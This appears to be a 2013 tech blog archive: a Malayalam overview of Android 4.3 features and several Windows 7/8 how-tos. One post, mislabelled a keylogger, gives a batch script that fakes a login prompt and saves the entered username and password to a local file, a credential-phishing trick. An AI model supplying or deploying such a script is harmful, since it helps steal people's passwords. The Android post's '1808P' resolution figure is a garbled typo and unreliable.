Friday, July 26, 2013

New Features of ANDROID Jelly Bean 4.3

New Features of ANDROID Jelly Bean 4.3
By
Ajay.E
 
  ആന്‍ഡ്രോയിഡ് ജെല്ലി ബീന്‍ പതിപ്പ് 4.2മായി താരതമ്യം ചെയ്യുമ്പോള്‍ കാര്യമായ മാറ്റങ്ങള്‍ ഒന്നും പുതിയ പതിപ്പായ 4.3ല്‍ ഇല്ല. പക്ഷേ ഉപഭോക്താക്കള്‍ക്കും, ആന്‍ഡ്രോയിഡ് പ്രോഗ്രാമ്മര്‍സിനും ഗുണകരമായ പല മാറ്റങ്ങളും ഈ പുതിയ പതിപ്പില്‍ ഉണ്ട്.
Androi 4-3 JellyBean
  1. മള്‍ട്ടി യൂസര്‍ റെസ്ട്രിക്റ്റഡ് പ്രൊഫൈല്‍
    ഈ പുതിയ സവിശേഷത വഴി ഒന്നില്‍ കൂടുതല്‍ യൂസര്‍ അക്കൗണ്ട്‌ ഉണ്ടാക്കാം, മാത്രമല്ല ഉണ്ടാക്കിയ പുതിയ യൂസര്‍ അക്കൗണ്ടിറിന്റെ ഫോണിലെ പ്രവര്‍ത്തികള്‍ അഡ്മിന്‍ അക്കൗണ്ടിന് പരിമിതിപെടുത്താം. അതായത് ഏതൊക്കെ ആപ്പ്സ് ഉപയോഗിക്കാം, ആപ്പ്സ് ഇന്‍സ്റ്റോള്‍ ചെയുന്നത് തുടങ്ങിയ കാര്യങ്ങള്ളില്‍ അഡ്മിന്‍ യൂസര്‍ക്ക് നിയന്ത്രണം ഏര്‍പെടുത്താം. രക്ഷിതാക്കള്‍ക്ക് കുട്ടികള്‍ അവരുടെ ഫോണിലും, ടാബിലും എന്തൊക്കെ ചെയ്യാം എന്നതില്‍ നിയന്ത്രണം ഏര്‍പെടുത്താം. എന്റര്‍പ്രൈസസ് ലെവലിലും മള്‍ട്ടി യൂസര്‍ റെസ്ട്രിക്റ്റഡ് പ്രൊഫൈല്‍ കൊണ്ട് പല ഉപയോഗങ്ങളും ഉണ്ട്.
  2. ബ്ലൂടൂത്ത് സ്മാര്‍ട്ട്‌
    ബ്ലൂടൂത്ത് സ്മാര്‍ട്ട്‌ ഫീച്ചര്‍ വഴി ബ്ലൂടൂത്ത് കണക്ടിവിറ്റിക്കായി കുറച്ച് എനര്‍ജി മാത്രമേ ഉപയോഗിക്കൂ. അതുകൊണ്ട് ബ്ലൂടൂത്ത് ആക്സസറികള്‍ ഉപയോഗിക്കുമ്പോള്‍ കുറച്ച് എനര്‍ജി മാത്രമേ ചിലവാകൂ. അങ്ങനെ ബാറ്ററിയിലെ ചാര്‍ജ് കൂടുതല്‍ നേരം നീണ്ടു നില്‍ക്കും. ബ്ലൂടൂത്ത് എവിസിആര്‍പി 1.3 സപ്പോര്‍ട്ടും ഉണ്ട്.
  3. ഓപ്പണ്‍ജിഎല്‍ (OpenGL|ES 3.0)
    ആന്‍ഡ്രോയിഡ് ഒഎസ് ഗെയിമം ഡെവലപ്പേര്‍സിന് വളരെ വലിയ ഒരു ഫീച്ചര്‍ ആണിത്. ഇത് വഴി വളരെ മേന്‍മയേറിയ ഗ്രാഫിക്സ് ഗെയിമുകളില്‍ ഉള്‍പെടുത്താന്‍ കഴിയും. ഒരു മൊബൈല്‍ ഫോണ്‍ ഒഎസ്സില്‍ ആദ്യമായാണ് OpenGL|ES 3.0 ടെക്നോളജി ഉപയോഗിക്കുന്നത്. ഇത് വഴി ആന്‍ഡ്രോയിഡ് ഗെയിമിങ്ങിന്റെ ഒരു പുതിയ യുഗം ആണ് ഗൂഗിള്‍ തുടങ്ങിയിരിക്കുന്നത്.
  4. ഡിആര്‍എം എപിഐ(DRM API) വഴി 1808P HD സ്ട്രീമിങ്ങ്
    ഡിആര്‍എം എപിഐ പുതിയ ഗൂഗിള്‍ ലൈബ്രറി വഴി HD വീഡിയോ സ്ട്രീമിങ്ങ് സാധ്യമാകുന്നു. മാത്രമല്ല വീഡിയോ കോപ്പിചെയുന്നതില്‍ നിന്ന് സുരക്ഷിതമാക്കാനും കഴിയും. നെറ്റ്ഫ്ലിക്സ് അവരുടെ പുതിയ ആന്‍ഡ്രോയിഡ് ആപ്പ് വഴി 1808p എച്ഡി വീഡിയോ സ്ട്രീമിങ്ങ് നല്‍കുന്നുണ്ട്. ഗൂഗിലിന്റെ നെക്സസ് ടാബിന് ആണ് ഈ ആപ്പ് ആദ്യം ലഭ്യമാവുക.
  5. വളരെ വേഗത്തില്‍ യൂസര്‍അക്കൗണ്ട്‌ മാറ്റം.
  6. എളുപ്പത്തില്‍ ടെക്സ്റ്റ്‌ ടൈപ്പ് ചെയ്യാം.
  7. പുതിയ സവിശേഷതകളോട് കൂടിയ ക്യാമറ ആപ്പ്.
  8. നവീകരിച്ച ഗൂഗിള്‍ സെര്‍ച്ച്‌.
  9. നവീകരിച്ച നോട്ടിഫിക്കേഷന്‍ സിസ്റ്റം.
  10. ഓട്ടോ കമ്പ്ലീറ്റ്‌ ഉള്ള ഡയല്‍ പാഡ്.
  11. വൈഫൈ വഴി ലോക്കേഷന്‍ തിരിച്ചറിയാം. ഇതിനുവേണ്ടി വിഫൈ എപ്പോളും ഓണ്‍ ചെയ്തു വെക്കേണ്ട.
  12. ഹിന്ദി, ആഫ്രികന്‍സ്‌, സ്വാഹിലി എന്നീ ഭാഷകളില്‍ ഈ ആന്‍ഡ്രോയിഡ് ഉപയോഗിക്കാം.
  13. ഹീബ്രു, അറബി തുടങ്ങിയ വലത്ത് നിന്ന് ഇടത്തോട്ട് എഴുതുന്ന ഭാഷ ഹോം സ്ക്രീനില്‍ സപ്പോര്‍ട്ട് ചെയ്യും.

Tuesday, June 18, 2013

How to Schedule Auto-Shutdown in Windows 7

How to Schedule Auto-Shutdown in Windows 7

Ajay. E

   Suppose, your antivirus software is scanning your computer or you are downloading or installing a program. You know that it will take some time but you cannot wait for it to finish, so you can shutdown your computer. This is where a program called Auto-Shutdown comes in. You just set the time at which you want your computer to shutdown and it will shutdown automatically at your chosen time. It is a very useful program and is very easy to make. You don't need to install any additional software. Basically, we are going to use Task Scheduler for this purpose.

    Here is the step-by-step guide on how to set up auto-shutdown in Windows 7.

1. Go to start menu and open Control Panel.
2. Click on Administrative Tools.
3. You will see many options. Click on Task Scheduler.
4. Click on Create Basic Task in the right-hand pane.
5. Write a suitable task name and description. For example, Name: Auto Shutdown. Description: Shutdown my computer automatically at 1:30 am.
6. Click next. Task Trigger screen will open.
7. Choose the number of times you want this task to take place.
For example: If you choose daily, your computer will shutdown daily at 1:30 am. Similarly, if you choose weekly or monthly, your computer will shutdown automatically at 1:30 am every week or month.
I want to shutdown windows just once, so I'll choose One time. However, you should choose the option according to your needs.
Now, click next and choose the time and date for your computer to shutdown automatically and click next.
8. Choose Start a Program and then, click next.
9. Type C:\Windows\System32\Shutdown.exe in the Program/script and type /s in Add arguments and click next.
10. Review your information and click Finish. You're almost done!
11. After clicking Finish, the Task Scheduler window should open again. Now we'll just check our task. Keep scrolling down, till you find the Auto Shutdown Task. You're done! Your computer should Shutdown at the mentioned time and day
.

 

 

Monday, May 27, 2013

How to: make a simple keylogger in notepad

How to: make a simple keylogger in notepad

Ajay.E

WARNING !!!!!!!!!!!!!
        I am not responsible for any trouble you may get into with this. For educational purposes only. The code we will be using is a simple Batch code.Pastebin makes it easy to give codes to people.

1.) Now paste that into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

Keylogger Code

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >Log.txt
    start >>Program Here<<
    exit
     
    RAW Paste Data  

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >Log.txt
    start >>Program Here<<
    exit

 


Friday, May 24, 2013

How does Windows tune your LCD for top text legibility?

Let Windows tune your LCD for top text legibility

Ajay.E

        Windows 7 is the first Windows OS for which, at its introduction, LCD monitors have truly been the overwhelming display standard. (They were well on their way at the time of Vista’s introduction, but the trend has accelerated with the ascendancy of laptops and the wholesale move to LCDs on desktop PCs.) The new OS includes a dedicated LCD-tweaking wizard that lets you improve the look of text on your screen. It’s called the ClearType Text Tuner (CTTT).
    You access CTTT from the Windows Control Panel; click on the Display item, and, in the resulting dialog, click on Adjust ClearType text. That will launch the wizard. Make sure on the first screen that the box next to Turn on ClearType is checked, and follow the prompts. Windows 7 will first check that your monitor or monitors are running at their native resolutions. (Native resolution generally delivers the best possible text legibility.) Then, it will take you through some comparisons reminiscent of a vision test at the eye doctor. The wizard runs a series of visual tests, asking you which block of text looks clearer to you, like this:
 
16-Tune-your-LCD

       When you’re done, chances are you’ll see a noticeable difference in text quality. After you’ve run CTTT, you may wish to return to the Display Control Panel and tweak the size of default Windows text. Under the subhead Make it easier to read what’s on your screen, try tweaking the setting from Smaller to Medium or Larger if that’s more comfortable for you. If you do indeed decide to change the default text size, however, we recommend running CTTT again so your screen is optimized for the new size.

How to Pin frequently used files or folders to taskbar program icons


Pin frequently used files or folders to taskbar program icons (Jump Lists) 

Ajay.E 

      Windows 7’s taskbar rethink means that a large number of the tips and tweaks here involve this thin bit of real estate, but here’s another taskbar-related tidbit that’s nonetheless invaluable. It’s been possible to set up shortcuts to frequently used files or folders on the Windows Desktop for ages, of course, but accessing them requires minimizing or otherwise moving around windows to uncover them. Windows 7, however, allows you to “pin” files or folders you use often onto relevant program icons in the taskbar for easy access, always keeping them above the desktop-window fray.
For example, say you often work with a spreadsheet file called “TAXES.XLS” in Excel. Launch Excel, then find the file “TAXES.XLS.” Left-click or right-click on the file itself, then drag it onto the Excel taskbar program icon. You should see a message to “Pin to Microsoft Excel”; when you do, release the mouse button.
The file will be added to what Windows 7 calls a Jump List, a list of frequently accessed files, folders, and actions that you can get to right from the taskbar via the program’s icon. Here's a sample Jump List for Microsoft Word:

13-Pin-to-Jump-Lists

For a Jump List to be at hand, the program needs to have been launched, however—or its icon permanently pinned to the taskbar

Thursday, May 16, 2013

How To Shutting down Windows 8 Quick and Easy



Shutting down Windows 8 Quick and Easy

Ajay.E

        To shut Windows 8 down, just move the mouse cursor to the bottom right corner of the screen, click the Settings icon - or just hold down the Windows key and press I - and you'll see a power button. Click this and choose 'Shut Down' or 'Restart'.
50 Windows 8 tips, tricks and secrets      Some of the tricks available in previous versions of Windows still apply. Press Ctrl+Alt+Del, for instance, click the power button in the bottom right-hand corner and you'll be presented with the same 'Shut Down' and 'Restart' options.
        And if you're on the desktop, press Alt+F4 and you'll be able to choose 'Shut Down', 'Restart', 'Sign Out' or 'Switch User' options.

Tuesday, May 14, 2013

How to switch your default printer automatically?

Automatically switch your default printer
Ajay.E


   Windows 7's location-aware printing allows the operating system to automatically switch your default printer as you move from one network to another.
     To set this up, first click Start, type Devices, and click the Devices and Printers link.
     Select a printer and click Manage Default Printers (this is only visible on a mobile device, like a laptop - you won't see it on a PC).
    Choose the "Change my default printer when I change networks" option, select a network, the default printer you'd like to use, and click Add.
      Repeat the process for other networks available, and pick a default printer for each one.
     And now, as you connect to a new network, Windows 7 will check this list and set the default printer to the one that you've defined.